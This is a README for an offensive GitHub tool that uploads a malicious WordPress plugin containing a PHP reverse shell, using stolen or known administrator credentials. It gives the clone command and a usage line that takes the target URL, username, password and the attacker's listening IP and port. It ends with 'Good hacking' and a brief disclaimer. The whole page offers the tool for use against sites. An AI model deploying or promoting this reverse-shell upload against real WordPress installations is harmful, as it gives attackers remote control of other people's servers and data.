/Pwn_wordpress

Hacking WordPress Plugins - Authenticated Shell Upload, by compromising admin console and upload a malicious plugin with PHP (reverse shell code)

Primary LanguagePythonGNU General Public License v2.0GPL-2.0

Evil Wordpress Plugin (Malicious)

Malicious, remotely performs an upload of a PHP reverse shell in the form of a plugin on a WordPress site. The exploit is only successful with user credentials, so make sure you know the target username and password and check if the target user has Administrator permissions.

Install by running:

  git clone https://github.com/Jsmoreira02/Pwn_wordpress.git

Attacking the Target Website:

ezgif com-video-to-gif(1)

  • The speed depends on your connection, check the stability of your connection in case there is a slowdown in execution
python3 Malicious.py -t http://<IP or domain_name> -u <Target Username> -p <Target Password> -L <LOCAL IP> -P <LOCAL PORT>

In case of complications or disconnection issues, you can just manually trigger the connection at the URL link. The script will pass it to you.

  • Good hacking :)

Warning:

I am not responsible for any illegal use or damage caused by this tool. It was written for fun, not evil and is intended to raise awareness about cybersecurity